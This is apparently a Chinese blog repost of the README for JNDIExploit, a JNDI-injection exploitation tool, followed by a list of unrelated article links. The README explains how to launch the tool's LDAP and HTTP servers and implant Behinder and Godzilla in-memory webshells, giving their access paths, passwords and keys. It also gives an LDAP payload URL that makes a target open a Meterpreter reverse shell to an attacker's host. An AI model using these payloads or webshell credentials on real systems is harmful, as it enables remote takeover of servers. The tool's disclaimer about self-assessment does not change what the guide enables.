当前位置: 首页 > news >正文

JNDIExploit使用方法

JNDIExploit

一款用于 JNDI注入 利用的工具,大量参考/引用了 Rogue JNDI 项目的代码,支持直接植入内存shell,并集成了常见的bypass 高版本JDK的方式,适用于与自动化工具配合使用。

对 @feihong-cs 大佬的项目https://github.com/feihong-cs/JNDIExploit 进行了一些改进,tomcatBypass现可直接上线msf。见添加内容2


免责声明

该工具仅用于安全自查检测

由于传播、利用此工具所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。

本人拥有对此工具的修改和解释权。未经网络安全部门及相关部门允许,不得善自使用本工具进行任何攻击活动,不得以任何方式将其用于商业目的。


添加内容

添加内容是为了支持SpringBootExploit工具,是定制版的服务端。

  1. 启动方式:java -jar JNDIExploit-1.3-SNAPSHOT.jar 默认绑定127.0.0.1 LDAP 绑定 1389 HTTP Server 绑定3456
  2. 根目录下BehinderFilter.class是内存马 /ateam 密码是ateamnb
  3. data/behinder3.jar 是为了支持SnakYaml RCE
  4. 添加HTTPServer处理更多的请求,为了更好支持SpringBootExploit工具
  5. 将文件放在data目录下,通过HTTPServer可以访问文件内容如同python的HTTPServer

添加内容2

新增哥斯拉内存马

  • 支持引用类远程加载方式打入(Basic路由)
  • 支持本地工厂类方式打入 (TomcatBypass路由)

哥斯拉客户端配置:

密码:pass1024
密钥:key
有效载荷:JavaDynamicPayload
加密器:JAVA_AES_BASE64

修复之前版本中的一些问题,冰蝎内存马现已直接可用冰蝎客户端直连

新增msf上线支持

  • 支持tomcatBypass路由直接上线msf:
  使用msf的java/meterpreter/reverse_tcp开启监听ldap://127.0.0.1:1389/TomcatBypass/Meterpreter/[msfip]/[msfport]

TODO

  1. 本地ClassPath反序列化漏洞利用方式
  2. 支持自定义内存马密码
  3. 内存马模块改一下

使用说明

使用 java -jar JNDIExploit.jar -h 查看参数说明,其中 --ip 参数为必选参数

http://www.lryc.cn/news/24243.html

相关文章:

  • 建议一般人不要全职做副业
  • pytorch入门6--数据分析(pandas)
  • 淘宝API接口开发系列,详情接口参数说明
  • keep-alive
  • Maven的生命周期及常用命令
  • 【Java开发】JUC基础 03:线程五大状态和主要方法
  • docker打包容器 在另一个机器上运行
  • 2023年全国最新保安员精选真题及答案9
  • arduino-sentry2之卡片篇
  • 七、JUC并发工具
  • C++ string类(二)及深浅拷贝
  • 「TCG 规范解读」TCG 软件栈 TSS (上)
  • (二)Markdown编辑器的使用效果 | 以CSDN自带MD编辑器为例
  • WebSocket网络通信执行流程
  • 【Shell学习笔记】4.Shell 基本运算符
  • 无代码资讯 | 《低代码开发平台能力要求》发布;CADP列入Gartner《2022-2024 中型企业技术采用路线图》
  • 智能家居Homekit系列一智能插座
  • React(三):脚手架、组件化、生命周期、父子组件通信、插槽
  • 2023年电子竞技行业报告
  • 小朋友就餐-课后程序(JAVA基础案例教程-黑马程序员编著-第八章-课后作业)
  • 大数据|Hadoop系统
  • 2.递归算法
  • MySQL---触发器
  • PXC高可用集群(MySQL)
  • pytorch-把线性回归实现一下。原理到实现,python到pytorch
  • js中判断数组的方式有哪些?
  • 【2023unity游戏制作-mango的冒险】-5.攻击系统的简单实现
  • SpringMVC 面试题
  • 布局三八女王节,巧借小红书数据分析工具成功引爆618
  • RISCV学习(1)基本模型认识